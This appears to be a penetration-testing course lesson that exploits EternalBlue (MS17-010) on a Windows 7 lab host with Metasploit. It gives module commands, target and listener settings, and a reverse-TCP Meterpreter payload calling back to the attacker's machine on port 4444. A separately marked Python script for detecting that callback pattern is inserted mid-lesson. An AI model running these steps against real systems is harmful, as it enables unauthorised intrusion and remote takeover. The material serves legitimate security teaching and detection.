Exploiting a remote RCE

Let's see now how to exploit all the information provided by Nmap and Nessus to penetrate our target system.

Here are the results from Nmap; Nessus, however, clearly does a much better job of presenting the vulnerabilities in a structured way.

We see that there are three critical vulnerabilities and four high-level (High) vulnerabilities.

The first step, as a pentester, consists of searching for vulnerabilities associated with the versions of the detected services.

For example, if you find a specific version of a service, you can search for it on the Exploit Database (Exploit-DB) website.

This is a public database that lists almost all known public exploits, classified by date.

If you search for "FTP" there, for example, you will get the list of all available exploit codes for the different versions of FTP servers.

However, be extremely careful during the exploitation phase, especially with RCE (Remote Code Execution) type vulnerabilities, because their execution can sometimes crash or restart the target server (which can cause a denial of service).

It is therefore essential to do thorough research on the web and forums to know if the exploit you plan to use is stable.

By consulting the Nessus report, we find that among the critical vulnerabilities is the Microsoft RDP RCE flaw discovered in 2019, also known as BlueKeep.

There is also an alert about an unsupported Windows operating system, as well as the MS11-030 flaw in DNS resolution which can allow remote code execution.

These are the first three critical vulnerabilities.

Lower down, in the high-level vulnerabilities, we note the MS17-010 flaw.

This is a very famous vulnerability called EternalBlue, which was notably exploited by the WannaCry ransomware in 2017.

There are also alerts concerning the SSL/TLS configuration (obsolete versions), as well as the MS12-020 vulnerability which can also lead to remote code execution.

To conduct our attack, we must choose a vulnerability.

Ideally, we prioritize the one that offers the best compromise between chances of success, stability for the target system, and the level of privileges obtained.

For this demonstration, we are going to choose the MS17-010 (EternalBlue) flaw.

As a pentester, you can perform research on each of these flaws.

You just have to copy the reference of the vulnerability and search for it on Exploit Database or on Google to understand how it works, its mechanism, and the associated risks.

To exploit this flaw, we will use the Metasploit framework.

Metasploit is an essential tool for penetration testing, which allows managing the reconnaissance, exploitation, and post-exploitation phases.

It is a true companion for the pentester.

If you want to deepen your knowledge of this tool, I have designed a complete course on Metasploit available on my site `cours.hackinggeek.com`.

To start, let's open a terminal and launch Metasploit with the command `msfconsole`.

Once the console is loaded, we will search for the exploit module for EternalBlue by typing the command `search eternalblue`.

Metasploit returns several modules.

We will select the first exploit for Windows, which corresponds to the MS17-010 vulnerability, by typing `use exploit/windows/smb/ms17_010_eternalblue` (or the module number).

We then type `show options` to visualize the parameters required by the module.

We must configure the target's IP address.

To do this, we use the command `set RHOSTS` followed by the IP address of our victim server.

The default port is the SMB port 445.

We verify the IP address of our Kali Linux attack machine (which is for example `.82`), then we configure the local listening address with the command `set LHOST` followed by this IP.

We leave the local listening port (`LPORT`) on its default value, `4444`.

The payload configured by default is `windows/x64/meterpreter/reverse_tcp`.

Meterpreter is one of the most powerful and widely used payloads in the Metasploit framework, because it offers a lot of features for exploitation and post-exploitation.

By typing `show options` again, we can verify that our entire configuration is correct: the target's IP address (`RHOSTS`), the port, the payload, and the address of our control machine (`LHOST`).

Once the exploit is configured, the principle is simple: Metasploit will exploit the vulnerability on the target server to inject and execute our payload there.

This payload will then initiate a reverse connection to the IP address of our Kali Linux on port 4444.

To launch the attack, we execute the command `exploit` (or `run`).
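The traffic pattern the lesson has just described (an inbound SMB connection on port 445, then the victim calling the same peer back on the default handler port 4444) is also what a defender can look for. The following is an added detection example, not code from the lesson or from Metasploit; the log format (`<epoch> <src_ip> <dst_ip> <dst_port>`), the addresses and the 120-second window are constructed assumptions.

```python
"""Added example (not from the original lesson): flag the sequence the lesson
describes, an inbound SMB connection (TCP/445) to a Windows host followed
shortly by an outbound connection from that host back to the same peer on the
Metasploit default LPORT (4444). The log lines, addresses and time window are
constructed for the example; the line format is an assumption."""

SMB_PORT = 445
DEFAULT_HANDLER_PORT = 4444   # default LPORT named in the lesson
WINDOW_SECONDS = 120          # assumption: callback arrives within 2 minutes

# Constructed connection log: "<epoch> <src_ip> <dst_ip> <dst_port>"
SAMPLE_LOG = """\
1700000000 10.0.0.82 10.0.0.50 445
1700000003 10.0.0.82 10.0.0.50 445
1700000011 10.0.0.50 10.0.0.82 4444
1700000020 10.0.0.7 10.0.0.50 445
1700000900 10.0.0.50 10.0.0.7 4444
1700001000 10.0.0.50 10.0.0.9 4444
"""


def parse_line(line):
    """Split one constructed log line into (ts, src, dst, dport)."""
    ts, src, dst, dport = line.split()
    return int(ts), src, dst, int(dport)


def find_reverse_shell_pairs(log_text, window=WINDOW_SECONDS):
    """Return (victim, attacker, smb_ts, callback_ts) tuples for every host
    that received SMB from a peer and then connected back to that peer on
    the handler port within `window` seconds."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort()                      # process in time order
    last_smb = {}                      # (peer, host) -> last SMB contact time
    hits = []
    for ts, src, dst, dport in events:
        if dport == SMB_PORT:
            last_smb[(src, dst)] = ts  # peer `src` touched SMB on host `dst`
        elif dport == DEFAULT_HANDLER_PORT:
            smb_ts = last_smb.get((dst, src))  # did `dst` hit `src`'s SMB earlier?
            if smb_ts is not None and 0 <= ts - smb_ts <= window:
                hits.append((src, dst, smb_ts, ts))
    return hits


if __name__ == "__main__":
    for victim, attacker, smb_ts, cb_ts in find_reverse_shell_pairs(SAMPLE_LOG):
        print(f"{victim} called back {attacker}:{DEFAULT_HANDLER_PORT} "
              f"{cb_ts - smb_ts}s after inbound SMB")
```

Because `LPORT` is trivially changed, the port number alone is a weak indicator; the robust part of the signal is the pairing of an inbound SMB contact with a prompt outbound connection from the server to that same peer, so in practice the port filter should be widened or dropped.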

From experience, know that the exploitation of EternalBlue can sometimes fail on the first attempt.

Be careful because, if the exploit fails badly, it can cause a blue screen of death (BSOD) on the Windows machine and make it restart, which poses a problem in production.

You must be patient and use stable exploits.

Here, we see the line "Sending stage", which indicates that the payload was successfully transmitted.

The exploitation succeeded and we obtain an active Meterpreter session.

We are now remotely connected to the victim machine.

If I launch the command `sysinfo`, the system confirms to me that it is indeed a Windows 7 machine whose host name is "John-PC".

This is exactly the server that we had identified during our scanning phase.

We analyzed the vulnerabilities detected by Nessus, selected the most appropriate flaw, and obtained remote access via Metasploit.

Now that we are on the server, we can interact with the system, navigate through the directories, or retrieve information.

The exploitation phase is finished.

The actions we will conduct from now on enter the post-exploitation phase.

That is to say, we are going to perform manipulations to escalate our privileges, collect sensitive data (such as passwords), and set up a persistent access on the target machine.

This is what we will study in the next lessons.
